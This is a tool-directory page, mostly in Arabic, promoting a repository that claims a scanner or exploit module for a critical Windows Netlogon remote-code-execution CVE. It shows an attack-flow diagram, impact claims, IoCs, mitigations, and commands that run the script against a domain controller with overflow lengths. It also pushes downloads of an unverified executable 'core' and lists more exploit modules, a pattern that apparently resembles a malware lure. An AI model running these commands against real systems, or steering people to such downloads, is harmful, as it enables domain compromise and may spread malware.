Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41089-Netlogon — 🛡️ وحدة تشخيص رسمية لأداة الأمن بالذكاء الاصطناعي للثغرة CVE-2026-41089 (تجاوز سعة المخزن المؤقت في مكدس Windows Netlogon والتنفيذ عن بُعد). تتضمن تحليلاً تقنياً، ومعمارية الهجوم، ومؤشرات الاختراق، واستراتيجية التخفيف. | Kitploit
أدوات/GitHubGitHub/zerodayvpn/cve-2026-41089-netlogon
أدوات دفاعيةإدارة مؤشرات الاختراق (IOC)تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستخبارات التهديداتالتعلم والتعليمالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
zerodayvpn/cve-2026-41089-netlogon

CVE-2026-41089-Netlogon

🛡️ وحدة تشخيص رسمية لأداة الأمن بالذكاء الاصطناعي للثغرة CVE-2026-41089 (تجاوز سعة المخزن المؤقت في مكدس Windows Netlogon والتنفيذ عن بُعد). تتضمن تحليلاً تقنياً، ومعمارية الهجوم، ومؤشرات الاختراق، واستراتيجية التخفيف.

عرض المستودعالموقع الإلكتروني
منذ يوم واحدلم تتم المراجعة بعد

🛡️ AI Security Tool Module
CVE-2026-41089: Netlogon Stack Buffer Overflow

الوحدة الرسمية لفحص الأمان لمنظومة AI Security Tool


Latest Release Build Status Donations Telegram Channel License

🌐 النسخة التجريبية • 📚 موقع المشروع • 💬 دردشة المجتمع

التنقل في الموقع: الرئيسية • التحديثات • التنزيلات • الوحدات

AI Security Tool Banner


🧠 نظرة مفاهيمية عامة

أنشر تحليلاً تقنياً مفصلاً لثغرة أمنية حرجة CVE-2026-41089 تم اكتشافها في خدمة Windows Netlogon. يُظهر تحليلي أن المشكلة مرتبطة بفيض المخزن المؤقت في المكدس (CWE-121). من خلال إرسال طلبات مُصممة خصيصاً إلى وحدة التحكم بالمجال (DC)، يمكن لمهاجم غير مُصادق عليه التسبب في تلف الذاكرة وتنفيذ تعليمات برمجية عشوائية على مستوى NT AUTHORITY\SYSTEM.

🎯 فلسفة التأثير الجوهري

"من يتحكم في Netlogon، يتحكم في المملكة."
نظراً لأن استغلال الثغرة لا يتطلب مصادقة أو تفاعل المستخدم، فإن هذه المشكلة تمثل تهديداً حرجاً للبنى التحتية للمؤسسات، مما يفتح طريقاً مباشراً لاختراق Active Directory.

📊 مواصفات الثغرة الأمنية

🕸 سيناريو الهجوم والبنية المعمارية

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|Network Access| B[Locate Domain Controller]
    B -->|Send Crafted Netlogon Packet| C[Trigger Stack Buffer Overflow]
    C -->|Memory Corruption in LSASS| D[Arbitrary Code Execution]
    D --> E[Full Domain Controller Takeover]
    E --> F[Complete Active Directory Compromise]

💡 المخاطر الرئيسية والتأثير

  • Domain Takeover: الاستيلاء الفوري على صلاحيات مسؤول المجال.
  • Credential Harvesting: وصول كامل إلى قاعدة بيانات الحسابات NTDS.dit.
  • Lateral Movement: وصول غير معيق إلى جميع الأجهزة في المجال.
  • Persistence: إمكانية إنشاء Golden Tickets وحسابات مخفية.

🛡 الكشف عن التهديدات واصطيادها (IoCs)

🔍 مؤشرات الاختراق:

  • [!] إنهاء أو إعادة تشغيل خدمة Netlogon بشكل طارئ (العملية lsass.exe).
  • [!] إنشاء عمليات فرعية مشبوهة من lsass.exe.
  • [!] ارتفاعات مفاجئة في طلبات RPC غير الطبيعية إلى وحدات التحكم بالمجال.

📈 مصادر السجلات الموصى بها: Windows Security Events (Event IDs сбоев служб), Sysmon (Process Creation), Microsoft Defender for Identity.

🛠 قائمة التحقق من التخفيف

  • 🟢 تثبيت التصحيحات: قم بتثبيت تحديثات الأمان من Microsoft لوحدات تحكم مجال Windows Server على الفور.
  • 🟢 تقسيم الشبكة: قيّد الوصول إلى RPC/Netlogon فقط للشبكات الفرعية الموثوقة عبر جدار الحماية.
  • 🟡 مراقبة EDR: قم بإعداد التحليل السلوكي للعملية lsass.exe.

💻 تعليمات تشغيل الوحدة

⚠️ هام: تم تطوير هذه الوحدة حصرياً للتشخيص الآمن ضمن منصة AI Security Tool. نوصي بشدة باستخدام الوحدات المعتمدة فقط من المستودع الرسمي.

1️⃣ قم بتثبيت AI Security Tool

يتطلب تشغيل الوحدة وجود نواة البرنامج مثبتة:

تعليمات البناء من الكود المصدري متاحة في المستودع الرسمي لـ AI Security Tool.

2️⃣ تشغيل الفحص عبر CLI / الطرفية

root@kitploit:~
# Тест подключения и базовая проверка (короткое имя пользователя)
python3 CVE-2026-41089.py 10.0.50.21 corp.local

Проверка уязвимости к переполнению буфера (длина 130)

python3 CVE-2026-41089.py 10.0.50.21 corp.local -l 130

Безопасная проверка с повышенным таймаутом для медленных сетей

python3 CVE-2026-41089.py 10.0.50.21 corp.local -l 200 -t 10


🔍 وحدات فحص الأمان ومستودعات PoC

مجموعة من الثغرات الأمنية ونصوص PoC والأبحاث، يدعمها أعضاء مجتمعنا:

🔥 Remote Code Execution (RCE) & Network Vulns 4 модуля
  • CVE-2026-41089 — Netlogon Remote Code Execution Exploit @ZeroDayEvil
  • CVE-2026-20805 — Windows Remote Code Execution Proof-of-Concept @ZeroDayEvil
  • CVE-2026-41096 — Critical RCE Vulnerability Scanner Module @ZeroDayEvil
  • CVE-2026-24291 — Network Protocol Remote Code Execution @ZeroDayVPN
🛡️ Privilege Escalation (EoP) & Services 2 модуля
  • CVE-2026-66804 — CrossDevice Service Elevation of Privilege @ZeroDayVPN
  • CVE-2026-50416 — Local Privilege Escalation Writeup & PoC @ZeroDayEvil
📚 Vulnerability Research & Writeups 2 модуля
  • CVE-2026-42978 — Deep Technical Analysis & PoC Research @ZeroDayEvil
  • CVE-2026-83991 — Full WriteUp & Exploitation Demonstration @ZeroDayVPN

⚖️ الترخيص وإخلاء المسؤولية القانونية

🚨 إخلاء المسؤولية

تُقدَّم هذه الوحدة والمواد حصرياً لتدقيق الأمان المُصرَّح به والأغراض البحثية.
يُعد استخدام هذه الوحدة على أنظمة دون موافقة كتابية مسبقة من المالك أمراً غير قانوني. لا يتحمل المؤلف ومطورو AI Security Tool أي مسؤولية عن الأضرار المحتملة الناتجة عن الاستخدام غير الصحيح للمواد.

🔄 المساهمة والمجتمع

نرحب بأي مساهمة في تطوير المشروع! المجالات الرئيسية:

  1. تكاملات الذكاء الاصطناعي: ربط مزودي LLM الجدد وتطوير وكلاء متخصصين.
  2. Security Tools: تطوير وحدات فحص الأمان ودمج ماسحات CLI.
  3. التحسين: زيادة سرعة عمل المحللات وأمان التنفيذ.
  4. التوثيق: كتابة المواد البحثية والترجمات.

🔗 التواصل والدعم

  • الموقع الرسمي: ZeroDayEvil.com
  • Telegram Admin: @ZeroDayEvil
  • Telegram Чат: @ZeroDyaTool_chat
  • Telegram Канал: @ZeroDyaTool_channel
  • للداعمين: PayPal Support
  • Open Collective: ZeroDayEvil

AI Security Tool — Reimagining terminal workflow and automation for cybersecurity professionals.

تنزيل الأداة
المعاملالقيمةملاحظة
CVE IDCVE-2026-41089المعرّف الرسمي للثغرة الأمنية
مستوى الخطورةCritical (CVSS v3.1: 9.8)████████████████████ 100%
نوع الثغرة الأمنيةCWE-121Stack-based Buffer Overflow
المكوّن المصابWindows Netlogon Serviceخدمة مصادقة Active Directory
ناقل الهجومNetwork (شبكي)تنفيذ عن بُعد دون الوصول إلى المضيف
الصلاحيات المطلوبةNone (غير مطلوبة)Unauthenticated RCE
نظام التشغيل / المنصةالإصدارالبنية / الصيغةتاريخ التحديثالحالةالتنزيل
🪟 Windowsv6.3.20x64 Installer (.exe)2026-09-08🟢 Latestتنزيل .exe
🪟 Windowsv6.3.20x64 Portable (.tar.gz)2026-09-08🟢 Latestتنزيل .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 Stableتنزيل .dmg
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 Stableتنزيل .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 Stableتنزيل .apk